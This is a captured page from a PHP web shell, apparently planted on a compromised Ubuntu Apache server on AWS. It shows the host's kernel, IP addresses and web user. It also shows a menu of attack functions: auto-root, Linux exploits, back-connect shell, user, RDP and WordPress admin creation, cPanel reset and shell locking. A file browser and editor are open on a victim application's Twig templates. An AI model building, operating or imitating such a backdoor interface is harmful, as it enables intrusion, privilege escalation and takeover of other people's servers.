Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.220.25.158
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mixchief_app /
templates /
Users /
[ HOME SHELL ]
Name
Size
Permission
Action
confirmation.html.twig
414
B
-rw-rw-r--
email.html.twig
1.97
KB
-rw-rw-r--
emailsent.html.twig
403
B
-rw-rw-r--
passwordchange.html.twig
1.72
KB
-rw-rw-r--
passwordemail.html.twig
1.97
KB
-rw-rw-r--
passwordreset.html.twig
865
B
-rw-rw-r--
profile.html.twig
1.75
KB
-rw-rw-r--
receipt.html.twig
5.25
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.html.twig
{% extends 'base1.html.twig' %} {% block content %} <div class="content"> <div class="row"> <div class="col-sm-7"> <div class="card"> <div class="card-body"> <form action="{{ path('account') }}" method="POST" enctype="multipart/form-data"> <div class="form-group"> <label for="company">Business Name</label> <input type="text" class="form-control" id="company" name="company" value="{{ user.company }}"> </div> <div class="form-group"> <label for="address">Address</label> <input type="text" class="form-control" id="address" name="address" value="{{ user.address }}"> </div> <div class="form-group"> <label for="state">State</label> <input type="text" class="form-control" id="state" name="state" value="{{ user.state }}"> </div> <div class="form-group"> <label for="email">Email</label> <input type="text" class="form-control" id="email" disabled value="{{ user.email }}"> </div> <div class="form-group"> <label for="telephone">Telephone</label> <input type="text" class="form-control" id="telephone" name="telephone" value="{{ user.telephone }}"> </div> <div class="form-group"> <label for="logo">Logo</label> <input type="file" class="form-control" id="logo" name="logo"> {% if user.logo %} <div class="current-logo"> <img src="{{ user.logo }}" alt="Company Logo"> {# <div class="delete-logo" style=~"margin: auto;"> <i class="fa fa-times"></i> </div> #} </div> {% endif %} </div> <button class="btn btn-primary">Update</button> </form> </div> </div> </div> </div> </div> {% endblock %}
Close